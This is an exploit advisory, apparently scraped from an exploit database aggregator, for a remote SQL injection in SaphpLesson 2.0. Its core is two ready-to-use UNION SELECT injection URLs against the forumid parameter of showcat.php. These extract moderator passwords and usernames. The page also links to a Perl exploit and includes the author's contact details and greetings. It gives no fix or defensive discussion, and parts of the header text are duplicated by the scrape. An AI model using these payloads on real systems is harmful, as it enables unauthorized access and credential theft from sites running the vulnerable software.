SaphpLesson 2.0 (forumid) Remote SQL Injection Exploit

2006-04-1400:00:00

vulners.com

JSON

SaphpLesson 2.0 (forumid) Remote SQL Injection Exploit

Discovered By SnIpEr_SA
Author : SnIpEr_SA
Exploit in Perl : http://www.milw0rm.com/exploits/download/1530
Remote : Yes
Local : No
Critical Level : Dangerous

Affected software description:

Indexu

Application : SaphpLesson
version     : 2.0
URL         : http://www.Arabless.com/
... 
------------------------------------------------------------------ 
Exploit:
~~~~~~~~ 
# For password # http://www.example.com/path/showcat.php?forumid=-1&#37;20union&#37;20select&#37;20ModPassword&#37;20from&#37;20modretor #
 For username # http://www.example.com/path/showcat.php?forumid=-1&#37;20union&#37;20select&#37;20ModName&#37;20from&#37;20modretor 
--------------------------------------------------------------------------- 
Contact:
 ~~~~~~~~
 SnIpEr_SA
E-mail: [email protected]
E-mail: SnIpEr_SA[at]Basdmail[dot]org
Homepage: http://www.3asfh.com/  &amp; http://www.lezr.com/
Greetz: All My Frind
 -------------------------------- [ EOF ] ----------------------------------

JSON

SaphpLesson 2.0 &#40;forumid&#41; Remote SQL Injection Exploit

SaphpLesson 2.0 (forumid) Remote SQL Injection Exploit

Discovered By SnIpEr_SA Author : SnIpEr_SA Exploit in Perl : http://www.milw0rm.com/exploits/download/1530 Remote : Yes Local : No Critical Level : Dangerous

SaphpLesson 2.0 (forumid) Remote SQL Injection Exploit

Discovered By SnIpEr_SA
Author : SnIpEr_SA
Exploit in Perl : http://www.milw0rm.com/exploits/download/1530
Remote : Yes
Local : No
Critical Level : Dangerous